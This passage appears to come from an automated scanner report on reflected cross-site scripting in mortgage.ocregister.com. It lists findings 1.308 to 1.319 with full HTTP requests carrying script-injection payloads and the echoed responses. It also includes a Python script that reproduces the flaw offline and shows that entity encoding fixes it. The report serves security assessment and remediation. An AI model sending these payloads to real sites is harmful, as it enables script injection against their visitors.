Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:13:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:13:21 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62651

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/0943615\"><script>alert(1)</script>66b5d481b5d/feed/" />
...[SNIP]...

1.308. http://mortgage.ocregister.com/2009/09/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2009/09/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fef8a"><script>alert(1)</script>5f63aeef702 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fef8a\"><script>alert(1)</script>5f63aeef702 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2009/09/?fef8a"><script>alert(1)</script>5f63aeef702=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:11 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 97531

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2009 September - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/09/?fef8a\"><script>alert(1)</script>5f63aeef702=1feed/" />
...[SNIP]...

1.309. http://mortgage.ocregister.com/2009/10/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2009/10/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 766d2"><script>alert(1)</script>feecef77490 was submitted in the REST URL parameter 1. This input was echoed as 766d2\"><script>alert(1)</script>feecef77490 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2009766d2"><script>alert(1)</script>feecef77490/10/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:13:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:13:36 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009766d2\"><script>alert(1)</script>feecef77490/10/feed/" />
...[SNIP]...

1.310. http://mortgage.ocregister.com/2009/10/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2009/10/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95802"><script>alert(1)</script>54504d64364 was submitted in the REST URL parameter 2. This input was echoed as 95802\"><script>alert(1)</script>54504d64364 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2009/1095802"><script>alert(1)</script>54504d64364/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:13:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:13:50 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62643

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/1095802\"><script>alert(1)</script>54504d64364/feed/" />
...[SNIP]...

1.311. http://mortgage.ocregister.com/2009/10/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2009/10/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef3c3"><script>alert(1)</script>f4108a4af6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ef3c3\"><script>alert(1)</script>f4108a4af6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2009/10/?ef3c3"><script>alert(1)</script>f4108a4af6=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:11 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 108827

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2009 October - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/10/?ef3c3\"><script>alert(1)</script>f4108a4af6=1feed/" />
...[SNIP]...

1.312. http://mortgage.ocregister.com/2009/11/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2009/11/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39ed8"><script>alert(1)</script>ab1683ae201 was submitted in the REST URL parameter 1. This input was echoed as 39ed8\"><script>alert(1)</script>ab1683ae201 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /200939ed8"><script>alert(1)</script>ab1683ae201/11/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:13:00 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:13:01 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62653

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/200939ed8\"><script>alert(1)</script>ab1683ae201/11/feed/" />
...[SNIP]...

1.313. http://mortgage.ocregister.com/2009/11/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2009/11/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e730d"><script>alert(1)</script>71e0e703e3e was submitted in the REST URL parameter 2. This input was echoed as e730d\"><script>alert(1)</script>71e0e703e3e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2009/11e730d"><script>alert(1)</script>71e0e703e3e/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:13:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:13:04 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62653

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/11e730d\"><script>alert(1)</script>71e0e703e3e/feed/" />
...[SNIP]...

1.314. http://mortgage.ocregister.com/2009/11/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2009/11/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84d57"><script>alert(1)</script>16d0da66f08 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 84d57\"><script>alert(1)</script>16d0da66f08 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2009/11/?84d57"><script>alert(1)</script>16d0da66f08=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 105718

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2009 November - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/11/?84d57\"><script>alert(1)</script>16d0da66f08=1feed/" />
...[SNIP]...

1.315. http://mortgage.ocregister.com/2009/12/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2009/12/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce109"><script>alert(1)</script>3534b7ba531 was submitted in the REST URL parameter 1. This input was echoed as ce109\"><script>alert(1)</script>3534b7ba531 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2009ce109"><script>alert(1)</script>3534b7ba531/12/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:13:00 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:13:02 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009ce109\"><script>alert(1)</script>3534b7ba531/12/feed/" />
...[SNIP]...

1.316. http://mortgage.ocregister.com/2009/12/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2009/12/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1391f"><script>alert(1)</script>20503540395 was submitted in the REST URL parameter 2. This input was echoed as 1391f\"><script>alert(1)</script>20503540395 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2009/121391f"><script>alert(1)</script>20503540395/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:13:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:13:04 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/121391f\"><script>alert(1)</script>20503540395/feed/" />
...[SNIP]...

1.317. http://mortgage.ocregister.com/2009/12/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2009/12/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7488"><script>alert(1)</script>f79a6b90c3f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c7488\"><script>alert(1)</script>f79a6b90c3f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2009/12/?c7488"><script>alert(1)</script>f79a6b90c3f=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 96657

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2009 December - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/12/?c7488\"><script>alert(1)</script>f79a6b90c3f=1feed/" />
...[SNIP]...

1.318. http://mortgage.ocregister.com/2010/01/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2010/01/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 935fb"><script>alert(1)</script>77d498ba61a was submitted in the REST URL parameter 1. This input was echoed as 935fb\"><script>alert(1)</script>77d498ba61a in the application's response. The server answers 404 Not Found for the modified path, but the 404 page is itself the HTML that carries the reflection, so the error status does not mitigate the issue: a browser following the crafted link renders that page and runs the injected script. As in the other findings on this host, the backslash before the echoed quote is not an HTML escape and does not prevent the attribute from being closed.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010935fb"><script>alert(1)</script>77d498ba61a/01/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:12:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:12:52 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62652

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010935fb\"><script>alert(1)</script>77d498ba61a/01/feed/" />
...[SNIP]...
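Findings 1.317 and 1.318 (and the entries that follow for this host) all show the same sink: the raw request URI, whether the query string or a path segment, is appended to the href of the feed link with only a backslash placed before the quote. The script below is an added example; it is not part of the scanner report and not the site's code. render_feed_link is a hypothetical reconstruction written only to reproduce the echoed output seen in the responses above, BASE and the prefix/suffix markers are taken from the findings, and the two probe URIs are constructed from the requests in 1.317 and 1.318. It shows that an HTML tokenizer still sees a script start tag after the backslash-escaped quote, that the scanner's marker check is enough to detect the break-out, and that entity-encoding the same input removes it.

```python
"""Offline reproduction of the attribute-context reflection in findings
1.317 and 1.318 (added example; not code from the report or the site).

render_feed_link() is a HYPOTHETICAL stand-in for the template that built
the <link rel="alternate"> element in the observed responses.  It is written
to reproduce the echoed output (payload inside a double-quoted href with a
backslash before the quote), not copied from the target.
"""
import html
from html.parser import HTMLParser
from typing import Optional, Set

BASE = "http://mortgage.ocregister.com"  # host named in the findings


def addslashes(s: str) -> str:
    """PHP addslashes()-style escaping, which is what the echoed c7488\\"> suggests.
    It only matters to a string parser; an HTML tokenizer ignores the backslash."""
    return s.replace("\\", "\\\\").replace('"', '\\"').replace("'", "\\'")


def render_feed_link(request_uri: str, hardened: bool = False) -> str:
    """Build the feed <link> the way the observed responses do: the request URI
    (path plus query string) is appended to the host and the literal "feed/".

    hardened=False reproduces the site's behaviour (addslashes only).
    hardened=True  applies HTML attribute encoding to the untrusted part.
    """
    if hardened:
        safe = html.escape(request_uri, quote=True)   # " -> &quot;  < -> &lt;  > -> &gt;
    else:
        safe = addslashes(request_uri)                # backslash is not an HTML escape
    return (
        '<link rel="alternate" type="application/rss+xml" '
        'title=" Mortgage Insider - www.ocregister.com" '
        f'href="{BASE}{safe}feed/" />'
    )


class _ScriptCounter(HTMLParser):
    """Counts <script> start tags as a browser's tokenizer would see them."""

    def __init__(self) -> None:
        super().__init__()
        self.scripts = 0

    def handle_starttag(self, tag, attrs) -> None:
        if tag == "script":
            self.scripts += 1


def count_script_tags(markup: str) -> int:
    parser = _ScriptCounter()
    parser.feed(markup)
    parser.close()
    return parser.scripts


def reflected_between(body: str, prefix: str, suffix: str) -> Optional[str]:
    """What the application echoed between the scanner's random prefix and
    suffix markers, or None if both markers are not present in that order."""
    start = body.find(prefix)
    if start < 0:
        return None
    end = body.find(suffix, start + len(prefix))
    if end < 0:
        return None
    return body[start + len(prefix):end]


def unencoded_breakout_chars(echoed: str) -> Set[str]:
    """Characters that must never survive raw inside a double-quoted attribute."""
    return {c for c in '"<>' if c in echoed}


# Constructed probes mirroring the requests in 1.317 (query-parameter name)
# and 1.318 (REST URL parameter 1); the random markers are the report's own.
QUERY_PROBE = '/2009/12/?c7488"><script>alert(1)</script>f79a6b90c3f=1'
REST_PROBE = '/2010935fb"><script>alert(1)</script>77d498ba61a/01/'


def assess(request_uri: str, prefix: str, suffix: str, hardened: bool) -> dict:
    """Render the link for one probe and report the scanner-style verdict."""
    body = render_feed_link(request_uri, hardened)
    echoed = reflected_between(body, prefix, suffix) or ""
    return {
        "echoed": echoed,
        "breakout_chars": unencoded_breakout_chars(echoed),
        "script_tags": count_script_tags(body),
    }


if __name__ == "__main__":
    for uri, pre, suf in ((QUERY_PROBE, "c7488", "f79a6b90c3f"),
                          (REST_PROBE, "935fb", "77d498ba61a")):
        for hardened in (False, True):
            print("hardened" if hardened else "as observed", assess(uri, pre, suf, hardened))
```

The detection side is the same check the scanner applies: locate the random markers in the response, then look at what survived between them. If a raw double quote or angle bracket survives in an attribute context, the attribute can be closed regardless of any backslash, and count_script_tags confirms that a tokenizer then sees a new script element. With html.escape(quote=True) the echoed segment is entirely entity-encoded and no script tag is produced, which is the fix for every entry on this host.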

1.319. http://mortgage.ocregister.com/2010/01/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2010/01/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9d7d"><script>alert(1)</script>ca8ccf11586 was submitted in the REST URL parameter 2. This input was echoed as d9d7d\"><script>alert(1)</script>ca8ccf11586 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/01d9d7d"><script>alert(1)</script>ca8ccf11586/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:12:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:12:55 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
